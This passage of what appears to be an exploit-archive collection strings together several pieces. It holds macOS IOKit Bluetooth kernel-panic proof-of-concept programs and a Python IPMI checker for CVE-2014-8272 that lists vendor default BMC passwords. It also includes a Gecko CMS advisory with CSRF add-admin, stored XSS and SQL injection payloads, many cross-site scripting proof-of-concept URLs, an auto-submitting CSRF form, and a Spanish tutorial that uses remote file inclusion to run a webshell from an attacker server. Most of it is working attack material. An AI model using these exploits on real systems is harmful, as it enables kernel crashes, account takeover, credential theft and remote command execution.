  printf(" [+] Opened connection to service on port: %d\n", port);

  struct BluetoothCall a;

  memset(&a, 0, sizeof(a));

  a.sizes[0] = 0x1000;
  a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));

  a.sizes[1] = 0x1000;
  a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
  memset((void *)a.args[1], 0x22, 0x1000);


  /* Call DispatchHCISendRawACLData() */
  a.index = 0x63;

  /* Debug */
  for(int i = 0; i < 120; i++) {
    if(i % 8 == 0) printf("\n");
    printf("\\x%02x", ((unsigned char *)&a)[i]);
  }
  printf("\n");
  fflush(stdout);

  kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
			   (uint32_t) 0,       /* Selector */
			   NULL, 0,	       /* input, inputCnt */
			   (const void*) &a,   /* inputStruct */
			   sizeof(a),	       /* inputStructCnt */
			   NULL, NULL, NULL, NULL); /* Output stuff */
  printf("kr: %08x\n", kr);

  return IOServiceClose(port);
}
HireHackking 
/*
 * crash-issue2.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
 *
 * Triggers a panic overwriting a stack_canary.
 *
 * gcc -Wall -o crash-issue2{,.c} -framework IOKit
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>

#include <IOKit/IOKitLib.h>

struct BluetoothCall {
  uint64_t args[7];
  uint64_t sizes[7];
  uint64_t index;
};

int main(void) {
  /* Finding vuln service */
  io_service_t service =
    IOServiceGetMatchingService(kIOMasterPortDefault,
				IOServiceMatching("IOBluetoothHCIController"));

  if (!service) {
    return -1;
  }

  /* Connect to vuln service */
  io_connect_t port = (io_connect_t) 0;
  kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
  IOObjectRelease(service);
  if (kr != kIOReturnSuccess) {
    return kr;
  }

  printf(" [+] Opened connection to service on port: %d\n", port);

  struct BluetoothCall a;

  a.sizes[0] = 0x1000;
  a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));

  /* This arguments overflows a local buffer and the adjacent stack canary */
  a.sizes[1] = 264;
  a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
  memset((void *)a.args[1], 'A', a.sizes[1]);

  /* Call IOBluetoothHCIUserClient::DispatchHCIReadLocalName() */
  a.index = 0x2d;

  /* Debug */
  for(int i = 0; i < 120; i++) {
    if(i % 8 == 0) printf("\n");
    printf("\\x%02x", ((unsigned char *)&a)[i]);
  }
  printf("\n");
  fflush(stdout);

  kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
			   (uint32_t) 0,       /* Selector */
			   NULL, 0,	       /* input, inputCnt */
			   (const void*) &a,   /* inputStruct */
			   sizeof(a),	       /* inputStructCnt */
			   NULL, NULL, NULL, NULL); /* Output stuff */
  printf("kr: %08x\n", kr);

  return IOServiceClose(port);
}
HireHackking 
/*
 * crash-issue1.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
 *
 * Exploits a missing check in
 * IOBluetoothHCIUserClient::DispatchHCICreateConnection() causing a panic.
 *
 * gcc -Wall -o crash-issue1{,.c} -framework IOKit
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>

#include <IOKit/IOKitLib.h>

#define SIZE 0x1000

struct BluetoothCall {
  uint64_t args[7];
  uint64_t sizes[7];
  uint64_t index;
};

int main(void) {
  /* Finding vuln service */
  io_service_t service =
    IOServiceGetMatchingService(kIOMasterPortDefault,
				IOServiceMatching("IOBluetoothHCIController"));

  if (!service) {
    return -1;
  }

  /* Connect to vuln service */
  io_connect_t port = (io_connect_t) 0;
  kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
  IOObjectRelease(service);
  if (kr != kIOReturnSuccess) {
    return kr;
  }

  printf(" [+] Opened connection to service on port: %d\n", port);

  struct BluetoothCall a;
  int i;

  for (i=0; i<7; i++) {
    a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
    a.sizes[i] = SIZE;
  }

  /* This value causes IOMalloc() to fail */
  a.args[6] = 0x0;
  a.sizes[6] = 0x80000041;
  a.index = 0x06;	/* DispatchHCICreateConnection() */

  for(i = 0; i < 120; i++) {
    if(i % 8 == 0) printf("\n");
    printf("\\x%02x", ((unsigned char *)&a)[i]);
  }
  printf("\n");

  kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
			   (uint32_t) 0,       /* Selector */
			   NULL, 0,	       /* input, inputCnt */
			   (const void*) &a,     /* inputStruct */
			   120,		       /* inputStructCnt */
			   NULL, NULL, NULL, NULL); /* Output stuff */
  printf("kr: %08x\n", kr);

  return IOServiceClose(port);
}
HireHackking 
"""
For testing purposes only.

(c) Yong Chuan, Koh 2014
"""

from time import sleep
from socket import *
from struct import *
from random import *
import sys, os, argparse 

HOST = None
PORT = 623

bufsize = 1024
recv = ""


# create socket
UDPsock = socket(AF_INET,SOCK_DGRAM)
UDPsock.settimeout(2)

data = 21	#offset of data start

RMCP = ('\x06' + 	#RMCP.version = ASF RMCP v1.0
	'\x00' +	#RMCP.reserved
	'\xFF' +	#RMCP.seq
	'\x07'		#RMCP.Type/Class = Normal_RMCP/IPMI
	)



def SessionHeader (ipmi, auth_type='None', seq_num=0, sess_id=0, pwd=None):
	auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}

	sess_header = ''
	sess_header += pack('<B', auth_types[auth_type])
	sess_header += pack('<L', seq_num)
	sess_header += pack('<L', sess_id)
	if auth_type is not 'None':
		raw = pwd + pack('<L', sess_id) + ipmi + pack('<L', seq_num) + pwd
		import hashlib
		h = hashlib.md5(raw)
		sess_header += h.digest()
	sess_header += pack('B', len(ipmi))
			
	return sess_header


class CreateIPMI ():
	def __init__ (self):
		self.priv_lvls = {'Reserved':0, 'Callback':1, 'User':2, 'Operator':3, 'Admin':4, 'OEM':5, 'NO ACCESS':15 }
		self.priv_lvls_2 = {0:'Reserved', 1:'Callback', 2:'User', 3:'Operator', 4:'Admin', 5:'OEM', 15:'NO ACCESS'}
		self.auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}

	def CheckSum (self, bytes):

		chksum = 0
		q = ''
		for i in bytes:
			q += '%02X ' %ord(i)
			chksum = (chksum + ord(i)) % 0x100
		if chksum > 0:
			chksum = 0x100 - chksum

		return pack('>B', chksum)


	def Header (self, cmd, seq_num=0x00):
		#only for IPMI v1.5
		cmds = {'Get Channel Auth Capabilities'	: (0x06, 0x38), #(netfn, cmd_code)
			'Get Session Challenge'		: (0x06, 0x39), 
			'Activate Session'		: (0x06, 0x3a),
			'Set Session Privilege Level'	: (0x06, 0x3b),
			'Close Session'			: (0x06, 0x3c),
			'Set User Access'		: (0x06, 0x43),
			'Get User Access'		: (0x06, 0x44),
			'Set User Name'			: (0x06, 0x45),
			'Get User Name'			: (0x06, 0x46),
			'Set User Password'		: (0x06, 0x47),
			'Get Chassis Status'		: (0x00, 0x01)}
		ipmi_header = ''
		ipmi_header += pack('<B', 0x20)			#target addr
		ipmi_header += pack('<B', cmds[cmd][0]<<2 | 0) 	#netfn | target lun
		ipmi_header += self.CheckSum (ipmi_header)
		ipmi_header += pack('<B', 0x81)			#source addr
		ipmi_header += pack('<B', seq_num<<2 | 0)	#seq_num | source lun
		ipmi_header += pack('<B', cmds[cmd][1])		#IPMI message command

		return ipmi_header


	def GetChannelAuthenticationCapabilities (self, hdr_seq, chn=0x0E, priv_lvl='Admin'):
		ipmi = ''
		ipmi += self.Header('Get Channel Auth Capabilities', hdr_seq)
		ipmi += pack('<B', 0<<7 | chn)			#IPMI v1.5 | chn num (0-7, 14=current_chn, 15)
		ipmi += pack('<B', self.priv_lvls[priv_lvl])	#requested privilege level
		ipmi += self.CheckSum (ipmi[3:])
		
		return ipmi


	def GetSessionChallenge (self, hdr_seq, username, auth_type='MD5'):
		#only for IPMI v1.5
		ipmi = ''
		ipmi += self.Header('Get Session Challenge', hdr_seq)
		ipmi += pack('<B', self.auth_types[auth_type])	#authentication type
		ipmi += username				#user name
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def ActivateSession (self, hdr_seq, authcode, auth_type='MD5', priv_lvl='Admin'):
		#only for IPMI v1.5	
		ipmi = ''
		ipmi += self.Header('Activate Session', hdr_seq)
		ipmi += pack('>B', self.auth_types[auth_type])
		ipmi += pack('>B', self.priv_lvls[priv_lvl])
		ipmi += authcode		#challenge string
		ipmi += pack('<L', 0xdeadb0b0)	#initial outbound seq num
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def SetSessionPrivilegeLevel (self, hdr_seq, priv_lvl='Admin'):
		#only for IPMI v1.5
		ipmi = ''
		ipmi += self.Header('Set Session Privilege Level', hdr_seq)
		ipmi += pack('>B', self.priv_lvls[priv_lvl])
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def CloseSession (self, hdr_seq, sess_id):
		ipmi = ''
		ipmi += self.Header ("Close Session", hdr_seq)
		ipmi += pack('<L', sess_id)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def GetChassisStatus (self, hdr_seq):
		ipmi = ''
		ipmi += self.Header ("Get Chassis Status", hdr_seq)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def GetUserAccess (self, hdr_seq, user_id, chn_num=0x0E):
		ipmi = ''
		ipmi += self.Header ("Get User Access", hdr_seq)
		ipmi += pack('>B', chn_num)		#chn_num = 0x0E = current channel
		ipmi += pack('>B', user_id)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def GetUserName (self, hdr_seq, user_id=2):
		ipmi = ''
		ipmi += self.Header ("Get User Name", hdr_seq)
		ipmi += pack('>B', user_id)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def SetUserName (self, hdr_seq, user_id, user_name):
		#Assign user_name to user_id, replaces if user_id is occupied
		ipmi = ''
		ipmi += self.Header ("Set User Name", hdr_seq)
		ipmi += pack('>B', user_id)
		ipmi += user_name.ljust(16, '\x00')
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def SetUserPassword (self, hdr_seq, user_id, password, op='set password'):
		ops = {'disable user':0, 'enable user':1, 'set password':2, 'test password':3}
		ipmi = ''
		ipmi += self.Header ("Set User Password", hdr_seq)
		ipmi += pack('>B', user_id)
		ipmi += pack('>B', ops[op])
		ipmi += password.ljust(16, '\x00') #IPMI v1.5: 16bytes | IPMI v2.0: 20bytes
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def SetUserAccess (self, hdr_seq, user_id, new_priv, chn=0x0E):
		ipmi = ''
		ipmi += self.Header ("Set User Access", hdr_seq)
		ipmi += pack('<B', 1<<7 | 0<<6 | 0<<5 | 1<<4 | chn)	#bit4=1=enable user for IPMI Messaging | chn=0xE=current channel
		ipmi += pack('>B', user_id)
		ipmi += pack('>B', self.priv_lvls[new_priv])
		ipmi += pack('>B', 0)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


def SendUDP (pkt):

	global HOST, PORT, data

	res = ''
	code = ipmi_seq = 0xFFFF
	for i in range(5):
		try:
			UDPsock.sendto(pkt, (HOST, PORT))
			res = UDPsock.recv(bufsize)
		except Exception as e:
			print '[-] Socket Timeout: Try %d'%i
			sleep (0)
		else:
			#have received a reply
			if res[4:5] == '\x02':		#Session->AuthType = MD5
				data += 16
			code 	= unpack('B',res[data-1:data])[0]
			ipmi_seq= unpack('B',res[data-3:data-2])[0]>>2
			if res[4:5] == '\x02':
				data -= 16
			break
	return code, ipmi_seq, res


def SetUpSession (username, pwd, priv='Admin', auth='MD5'):

	global data

	#Get Channel Authentication Capabilities
	ipmi = CreateIPMI().GetChannelAuthenticationCapabilities(0, chn=0xE, priv_lvl=priv)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
	if code != 0x00:
		return code, 0, 0, 0
	#print '[+]%-30s: %02X (%d)'%('Get Chn Auth Capabilities', code, ipmi_seq)


	#Get Session Challenge
	ipmi = CreateIPMI().GetSessionChallenge(1, username, 'MD5')
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
	if code != 0x00:
                if code == 0xFFFF:
                        print "[-] BMC didn't respond to IPMI v1.5 session setup"
                        print "    If firmware had disabled it, then BMC is not vulnerable"
		return code, 0, 0, 0
	temp_sess_id 	= unpack('<L', res[data:data+4])[0]
	challenge_str 	= res[data+4:data+4+16]
	#print '[+]%-30s: %02X (%d)'%('Get Session Challenge', code, ipmi_seq)


	#Activate Session
	ipmi = CreateIPMI().ActivateSession(2, challenge_str, auth, priv)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, auth, 0, temp_sess_id, pwd) + ipmi)
	if code != 0x00:
		return code, 0, 0, 0
	data += 16
	sess_auth_type 			= unpack('B', res[data:data+1])[0]
	sess_id 			= unpack('<L', res[data+1:data+1+4])[0]
	ini_inbound = sess_hdr_seq 	= unpack('<L', res[data+5:data+5+4])[0]
	sess_priv_lvl 			= unpack('B', res[data+9:data+9+1])[0]
	#print '[+]%-30s: %02X (%d)'%('Activate Session', code, ipmi_seq)
	#print '   %-30s: Session_ID %08X'%sess_id
	data -= 16


	#Set Session Privilege Level
	ipmi = CreateIPMI().SetSessionPrivilegeLevel(3, priv)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_hdr_seq, sess_id) + ipmi)
	sess_hdr_seq += 1
	if code != 0x00:
		return code, 0, 0, 0
	new_priv_lvl = unpack('B', res[data:data+1])[0]
	#print '[+]%-30s: %02X (%d)'%('Set Session Priv Level', code, ipmi_seq)


	return code, temp_sess_id, sess_hdr_seq, sess_id
	

def CloseSession (sess_seq, sess_id):

	global data

	#Close Session
	ipmi = CreateIPMI().CloseSession(5, sess_id)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
	#print '[+]%-30s: %02X (%d)'%('Close Session', code, ipmi_seq)

	return code


def CheckSessionAlive(sess_seq, sess_id):
	#SetUserPassword(): "user enable <user_id>"
	ipmi = CreateIPMI().GetChassisStatus(31)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
	print '[+] %-35s: %02X (%d)'%('CheckSessionAlive->GetChassisStatus', code, ipmi_seq)
	sess_seq += 1
	
	return sess_seq





def banner():
        print ("######################################################\n"+\
               "## This tool checks whether a BMC machine is vulnerable to CVE-2014-8272\n"+\
               "## (http://www.kb.cert.org/vuls/id/843044)\n"+\
               "## by logging the TemporarySessionID/SessionID in each IPMI v1.5 session,\n"+\
               "## and checking that these values are incremental\n"+\
               "## \n"+\
               "## Author:  Yong Chuan, Koh\n"+\
               "## Email:   yongchuan.koh@mwrinfosecurity.com\n"+\
               "## (c) Yong Chuan, Koh 2014\n"+\
               "######################################################\n")


def main():

        banner()
        
        #default usernames/passwords (https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi)
        vendors = {"HP"         :{"user":"Administrator",       "pwd":""},     #no default pwd: <factory randomized 8-character string>
                   "DELL"       :{"user":"root",                "pwd":"calvin"},
                   "IBM"        :{"user":"USERID",              "pwd":"PASSW0RD"},
                   "FUJITSU"    :{"user":"admin",               "pwd":"admin"},
                   "SUPERMICRO" :{"user":"ADMIN",               "pwd":"ADMIN"},
                   "ORACLE"     :{"user":"root",                "pwd":"changeme"},
                   "ASUS"       :{"user":"admin",               "pwd":"admin"}
                   }
        
        arg = argparse.ArgumentParser(description="Test for CVE-2014-8272: Use of Insufficiently Random Values")
        arg.add_argument("-i", "--ip", required=True, help="IP address of BMC server")
        arg.add_argument("-u", "--udpport", nargs="?", default=623, type=int, help="Port of BMC server (optional: default 623)")
        arg.add_argument("-v", "--vendor", nargs="?", help="Server vendor of BMC (optional: for default BMC credentials)")
        arg.add_argument("-n", "--username", nargs="?", default=None, help="Username of BMC account (optional: for non-default credentials)")
        arg.add_argument("-p", "--password", nargs="?", default=None, help="Password of BMC account (optional: for non-default credentials)")

        args = arg.parse_args()

        if args.vendor is not None: args.vendor = args.vendor.upper()
        if (args.vendor is None or args.vendor not in vendors.keys()) and (args.username is None or args.password is None):
                print "[-] Error: -n and -p are required because -v is not specified/in default list"
                print "    Vendors with Default Accounts"
                print "    -----------------------------------"
                for vendor,acct in vendors.iteritems():
                        print "    %s: username='%s', password='%s'"%(vendor,acct["user"],acct["pwd"])
                sys.exit(1)
        
        if args.username is None:   args.username = vendors[args.vendor]["user"].ljust(16, '\x00')
        if args.password is None:   args.password = vendors[args.vendor]["pwd"].ljust(16, '\x00')


        global HOST, PORT
        HOST = args.ip  
        PORT = args.udpport

        print "Script Parameters"
        print "-------------------------"
        print "IP       : %s"%HOST                        
        print "Port     : %d"%PORT
        print "Username : %s"%args.username
        print "Password : %s"%args.password

        session_ids = []
        for i in xrange(0x80):  #do not go beyond 0xFF, because of how session_ids is checked for incremental later
                try:
                        code, temp_sess_id, sess_seq, sess_id = SetUpSession (args.username, args.password, priv='Admin', auth='MD5')
                        if code == 0:
                                session_ids.append(temp_sess_id)
                                session_ids.append(sess_id)
                                print '[+%04X] temp_sess_id=%08X, sess_id=%08X'%(i, temp_sess_id, sess_id)
                        else:
                                #print '[-%04X] SetUp Session: Trying again after timeout 5s'%(i)
                                sleep(5)
                                continue


                        code = CloseSession (sess_seq, sess_id)
                        if code == 0:
                                #print '[+%04X] Close Session OK'%(i)
                                i += 1
                                sleep (0.5)
                        else:
                                #print '[-%04X] Close Session fail: Wait for natural timeout (60+/-3s)'%(i)
                                sleep(65)

                except Exception as e:
                        exc_type, exc_obj, exc_tb = sys.exc_info()
                        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
                        print (exc_type, fname, exc_tb.tb_lineno)


        session_ids = session_ids[:0xFF]
        
        #get the first incremental diff
        const_diff = None
        for i in xrange(1, len(session_ids)):
                if session_ids[i-1] < session_ids[i]:
                        const_diff = session_ids[i] - session_ids[i-1]
                        break
        #check if session_ids are increasing at a fixed value
        vulnerable = True
        crossed_value_boundary = 0
        for i in xrange(1, len(session_ids)):

                if session_ids[i]-session_ids[i-1] != const_diff:
                        if crossed_value_boundary < 2:
                                crossed_value_boundary += 1
                        else:
                                vulnerable = False

        if vulnerable:
                print "Conclusion: BMC is vulnerable to CVE-2014-8272"
        else:
                print "Conclusion: BMC is not vulnerable to CVE-2014-8272"

        
        



if __name__ == "__main__":
    main()
HireHackking 
Gecko CMS 2.3 Multiple Vulnerabilities

Vendor: JAKWEB
Product web page: http://www.cmsgecko.com
Affected version: 2.3 and 2.2

Summary: Gecko CMS is the way to go, forget complicated, bloated
and slow content management systems, Gecko CMS has been build to
be intuitive, easy to use, extendable to almost anything, running
on all standard web hosting (PHP and one MySQL database, Apache is
a plus), browser compatibility and fast, super fast!

Desc: Gecko CMS suffers from multiple vulnerabilities including
Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting
and SQL Injection.

Tested on: Apache/2
           PHP/5.4.36


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5222
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php

27.12.2014
---

CSRF Add Admin:
===============
<html>
<body>
<form action="http://server/admin/index.php?p=user&sp=newuser" method="POST">
<input type="hidden" name="jak_name" value="Testingus2" />
<input type="hidden" name="jak_email" value="test2@test.test" />
<input type="hidden" name="jak_username" value="Testusername2" />
<input type="hidden" name="jak_usergroup" value="3" />
<input type="hidden" name="jak_access" value="1" />
<input type="hidden" name="jak_password" value="123123" />
<input type="hidden" name="jak_confirm_password" value="123123" />
<input type="hidden" name="save" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

usergroup 4 = moderator
          3 = administrator
          2 = member standard
          1 = guest
          5 = banned

Stored XSS (params: jak_img, jak_name, jak_url):
================================================

POST http://server/admin/index.php?p=categories&sp=newcat HTTP/1.1

jak_catparent	0
jak_catparent2	0
jak_footer	1
jak_img	"><script>alert(1);</script>
jak_lcontent	<p>test</p>
jak_lcontent2	
jak_menu	1
jak_name	"><script>alert(2);</script>
jak_name2	
jak_url	"><script>alert(3);</script>
jak_varname	ZSL
save	

SQL Injection (params: jak_delete_log[], ssp):
==============================================

POST /admin/index.php?p=logs&sp=s HTTP/1.1

delete=&jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&jak_delete_log%5B%5D=2&jak_delete_log%5B%5D=1

--

GET /admin/index.php?p=logs&sp=delete&ssp=3[SQLi] HTTP/1.1

Reflected XSS:
==============

/admin/index.php [horder%5B%5D parameter]
/admin/index.php [jak_catid parameter]
/admin/index.php [jak_content parameter]
/admin/index.php [jak_css parameter]
/admin/index.php [jak_delete_log%5B%5D parameter]
/admin/index.php [jak_email parameter]
/admin/index.php [jak_extfile parameter]
/admin/index.php [jak_file parameter]
/admin/index.php [jak_hookshow%5B%5D parameter]
/admin/index.php [jak_img parameter]
/admin/index.php [jak_javascript parameter]
/admin/index.php [jak_lcontent parameter]
/admin/index.php [jak_name parameter]
/admin/index.php [jak_password parameter]
/admin/index.php [jak_showcontact parameter]
/admin/index.php [jak_tags parameter]
/admin/index.php [jak_title parameter]
/admin/index.php [jak_url parameter]
/admin/index.php [jak_username parameter]
/admin/index.php [real_hook_id%5B%5D parameter]
/admin/index.php [sp parameter]
/admin/index.php [sreal_plugin_id%5B%5D parameter]
/admin/index.php [ssp parameter]
/admin/index.php [sssp parameter]
/js/editor/plugins/filemanager/dialog.php [editor parameter]
/js/editor/plugins/filemanager/dialog.php [field_id parameter]
/js/editor/plugins/filemanager/dialog.php [fldr parameter]
/js/editor/plugins/filemanager/dialog.php [lang parameter]
/js/editor/plugins/filemanager/dialog.php [popup parameter]
/js/editor/plugins/filemanager/dialog.php [subfolder parameter]
/js/editor/plugins/filemanager/dialog.php [type parameter]
HireHackking 
source: https://www.securityfocus.com/bid/47901/info
    
Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
    
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.
    
This issue is being tracked by Cisco Bug ID CSCtn61716.

http://www.example.com/iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae
4c
http://www.example.com/iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7
HireHackking 
source: https://www.securityfocus.com/bid/47901/info
   
Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
   
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.
   
This issue is being tracked by Cisco Bug ID CSCtn61716.
   
Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.

http://www.example.com/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84"%3b
alert(1)//608ddbf972
http://www.example.com/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8"%3ba
lert(1)//79877affe89
HireHackking 
source: https://www.securityfocus.com/bid/47901/info
  
Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
  
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.
  
This issue is being tracked by Cisco Bug ID CSCtn61716.
  
Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.

http://www.example.com/iptm/eventmon?cmd=filterHelperca99b<script>alert(1)</script>542256870
d5&viewname=device.filter&operation=getFilter&dojo.preventCache=129851
8961028
http://www.example.com/iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)</script>
09520eb762c&dojo.preventCache=1298518963370
HireHackking

Remote File Inclusion (RFI)

El Remote File Inclusion (RFI) es una vulnerabilidad muy parecida al LFI (Local File Inclusion). La diferencia es que mientras el LFI te permite la inclusión de archivos locales, el RFI te permite incluir archivos remotos.

Claro esto es super turbio, porque si nosotros como atacante nos montamos un servidor web. Podemos aprovechar el RFI de la máquina víctima para que cargue e interprete como si fuera suyo un archivo malicioso que estemos alojando.

Vamos a montarnos la vulnerabilidad en local:

Primero de todo, creamos el archivo PHP que alojará la inclusión de archivos:

image 133

Este es un código sencillo donde a partir de una petición GET, el servidor recibirá un valor por el parámetro «file» e incluirá el archivo con ese nombre en la página.

Con este código, si accedemos a la URL:

  • http://localhost/index.php?file=/etc/hosts

Nos cargará el archivo hosts. Sin embargo, tenemos que habilitar que admita también URLs. Para ello, nos dirigimos a la configuración de PHP, la podemos encontrar con:

image 134

Como en mi caso el servidor web lo voy a montar usando el propio comando PHP, editaré el archivo de configuración de la segunda línea.

Dentro de este archivo, tenemos que buscar la variable allow_url_include:

image 124

Por defecto, el valor de esta variable será Off, por lo que nosotros simplemente la cambiamos a On y listo.

Con esto hecho, ya simplemente nos montamos el servidor web con el comando php:

  • php -S localhost:80
image 135
image 126

Podemos comprobar que el archivo y el servidor web funcionan correctamente, ya que el LFI funciona, esto ocurre porque el LFI y el RFI comparten el mismo código PHP, por lo que al comprobar que el LFI funciona sabemos que todo está correctamente.

Ahora bien, en otro equipo, voy a alojar el archivo malicioso (una webshell) y voy a montar un servidor web:

image 127

Ahora mismo este equipo que es un Debian con IP 192.168.118.131 está compartiendo el archivo sikushell.php.

Por lo que si yo ahora desde el servidor web vulnerable, cambio el /etc/hosts por la dirección del servidor web del Debian, debería de recibir una petición GET:

image 128
image 129

Efectivamente, por el lado del servidor recibo la petición GET, y por el lado del cliente puedo visualizar todo lo este está compartiendo. Ahora, además de especificar el servidor web, vamos a dirigirnos al archivo sikushell.php:

image 130

Parece que existe, pero no nos muestra nada, esto es porque está esperando el parámetro cmd, que es el que hemos indicado en el archivo malicioso:

image 131

Nótese como al concatenar el nuevo parámetro cmd a todo los demás, hemos usado un ampersand (&). Esto es porque la interrogación que corresponde siempre al primer parámetro, ya está siendo usada por el parámetro file.

Parece que se nos interpreta correctamente el archivo malicioso y estamos ejecutando comandos. Si vemos en que máquina estamos, podemos ver que estamos en el kali, dicho de otra forma, el servidor web vulnerable:

image 132

Estamos ejecutando comandos localmente usando un archivo remoto. Esto es básicamente un Remote File Inclusion.

HireHackking 
source: https://www.securityfocus.com/bid/47901/info
 
Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.
 
This issue is being tracked by Cisco Bug ID CSCtn61716.
 
Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.

http://www.example.com/iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceC
apability=deviceCap
http://www.example.com/iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c
06d&deviceCapability=deviceCap
HireHackking 
source: https://www.securityfocus.com/bid/47899/info

TWiki is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Versions prior to TWiki 5.0.2 are vulnerable. 


GET /twiki/bin/login/Sandbox/WebHome?%27%221=;origurl=1%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%280x00039C%29%3C/script%3E

GET /twiki/bin/login/Sandbox/WebHome?sudo=sudo;origurl=http://10.1.10.128/bin/view/Main/TWikiAdminUser%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x00044C%29%3C%2Fscript%3E
HireHackking 
source: https://www.securityfocus.com/bid/47901/info

Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.

This issue is being tracked by Cisco Bug ID CSCtn61716.

Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.

http://www.example.com/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fbe43447
HireHackking 
source: https://www.securityfocus.com/bid/47887/info

PHP Calendar Basic is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

PHP Calendar Basic 2.3 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?month=5"><script>alert(&#039;XSS&#039;)</script>&year=2011"><sc ript>alert(document.cookie)</script>

<form action="http://www.example.com/event_add.php?day=27&month=4&year=2011" method="post" name="main">
<input type="hidden" name="month" value="4">
<input type="hidden" name="day" value="27">
<input type="hidden" name="year" value="2011">
<input type="hidden" name="hour" value="20">
<input type="hidden" name="minute" value="00">
<input type="hidden" name="title" value="1<script>alert(&#039;XSS&#039;)</script>">
<input type="hidden" name="description" value="descr">
<input type="submit" id="btn" name="submit" value="Add Event">
</form>
<script>
document.getElementById(&#039;btn&#039;).click();
</script>


http://www.example.com/event_delete.php?day=28&month=4&year=2011&id=1"><script>alert(document.c ookie)</script>
HireHackking 
source: https://www.securityfocus.com/bid/47877/info

eFront is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

